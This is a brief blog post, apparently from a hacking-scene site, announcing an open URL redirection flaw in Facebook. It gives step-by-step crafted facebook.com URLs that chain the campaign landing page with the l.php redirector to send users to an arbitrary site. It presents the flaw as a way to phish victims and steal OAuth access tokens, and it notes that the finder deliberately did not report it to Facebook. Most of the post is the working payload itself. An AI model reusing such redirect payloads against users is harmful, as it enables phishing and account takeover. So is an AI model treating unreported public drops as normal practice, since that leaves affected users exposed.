Algerian Security Researcher "Asesino04" The Black Devils discovered an open URL redirection vulnerability in facebook that allowed attacker to have a facebook.com link edirect to any website without "Leave facebook" comment from facebook
This kind of vulnerability is used to trick the victime by clicking on a trusted link whcih is designed to lead the victime to a malcious website .
Also this vulnerability speacially if it was used to make a redirection on third part application can allowed attcker to steal the access token [Oauth Bug] which is very critical and dangerous .
The Founde of the exploit who is a member also in 1337DAY Team didn't report the bug to facebook
The vulnerability exists on the page where any person can download IOS or Android Sdk
You go to :
and you copy the link of "download sdk"
# you keep only this
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=
# then you add to it
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
#so it became like that :
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
:)
The Bug have full discolure
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection
A proof of Concept :
Aucun commentaire:
Enregistrer un commentaire